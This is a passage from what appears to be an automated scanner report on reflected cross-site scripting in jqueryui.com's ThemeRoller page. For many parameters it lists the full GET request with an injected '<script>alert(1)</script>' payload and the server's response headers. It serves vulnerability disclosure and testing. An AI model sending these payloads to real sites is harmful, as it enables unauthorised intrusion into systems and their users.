verlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:53:53 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d783"><script>alert(1)</script>2b423fbb9cc was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=209d783"><script>alert(1)</script>2b423fbb9cc&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf71a"><script>alert(1)</script>3021fc0395e was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20bf71a"><script>alert(1)</script>3021fc0395e&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:53:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5df9"><script>alert(1)</script>9a2ba1a34a3 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50e5df9"><script>alert(1)</script>9a2ba1a34a3&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:51 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 958d8"><script>alert(1)</script>dd7211d45b9 was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0958d8"><script>alert(1)</script>dd7211d45b9&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:54:00 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6979a"><script>alert(1)</script>b2a5040142e was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=1006979a"><script>alert(1)</script>b2a5040142e&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:54:04 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7e1d"><script>alert(1)</script>60f896847d1 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.pngd7e1d"><script>alert(1)</script>60f896847d1&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:53:05 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 865b2"><script>alert(1)</script>175935ab28c was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png865b2"><script>alert(1)</script>175935ab28c&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:35 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 725fa"><script>alert(1)</script>a9631e9090e was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png725fa"><script>alert(1)</script>a9631e9090e&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db08e"><script>alert(1)</script>da74d127cad was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.pngdb08e"><script>alert(1)</script>da74d127cad&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:53:52 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d14ec"><script>alert(1)</script>5d04dd7c806 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.pngd14ec"><script>alert(1)</script>5d04dd7c806&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5653"><script>alert(1)</script>a61da8af9c5 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.pngb5653"><script>alert(1)</script>a61da8af9c5&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:53:44 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7d42"><script>alert(1)</script>5be9fe66018 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.pnga7d42"><script>alert(1)</script>5be9fe66018&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:50 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0e2d"><script>alert(1)</script>60dbb8bd3af was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
